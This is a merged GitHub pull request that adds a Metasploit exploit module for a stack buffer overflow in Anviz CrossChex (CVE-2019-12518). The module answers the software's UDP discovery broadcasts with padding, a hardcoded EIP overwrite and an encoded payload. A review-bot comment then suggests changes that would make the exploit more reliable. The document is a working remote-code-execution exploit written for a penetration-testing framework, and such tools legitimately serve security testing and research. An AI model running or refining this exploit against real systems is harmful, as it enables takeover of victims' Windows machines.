Add crosschex buffer overflow exploit #12902

Merged
merged 13 commits into from
Feb 13, 2020
77 changes: 77 additions & 0 deletions modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10

include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'DefaultOptions' =>
{
'TIMEOUT' => 100,
'EncoderType' => Msf::Encoder::Type::Raw,
'CHOST' => "0.0.0.0",
'CPORT' => 5050
},
'Payload' =>
{
'Space' => 8947,
},
'Arch' => ARCH_X86,
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
end

def exploit
connect_udp

res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"])
unless res
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end

print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(261)
sploit << "\x07\x18\x42\x00" # Overwrites EIP to point to payload // Vulnerable CrossChex versions don't use ASLR or DEP
sploit << rand_text_english(4)
sploit << payload.encoded

udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
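Review bot: the timeout guard `unless res` after `res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"])` only catches a nil result; Ruby treats an empty string as truthy, and Rex's UDP `recvfrom` returns `['', nil, nil]` when its select times out, so the `fail_with(Failure::TimeoutExpired, ...)` branch is never taken and the module falls through to `udp_sock.sendto(sploit, host, port)` with a nil host and port. Guard on the sender address instead, e.g. `if res.nil? || res.empty? || host.nil?`. Three smaller points: `TIMEOUT` gets a value under `DefaultOptions` and is read from the datastore, but it is never registered with `register_options` (e.g. `OptInt.new('TIMEOUT', [true, 'Seconds to wait for a CrossChex broadcast', 100])`), so it does not appear in `show options` and cannot be adjusted by the user; the return address `"\x07\x18\x42\x00"` is tied to one build of the target binary, so the framework convention is to keep it in the target hash (`'Ret' => 0x00421807`, emitted with `[target.ret].pack('V')`) rather than inline in `exploit`, which also makes the empty `{}` target entry meaningful when further versions are added; and the description reads "Ainz CrossChex" where the module name and vendor are "Anviz CrossChex".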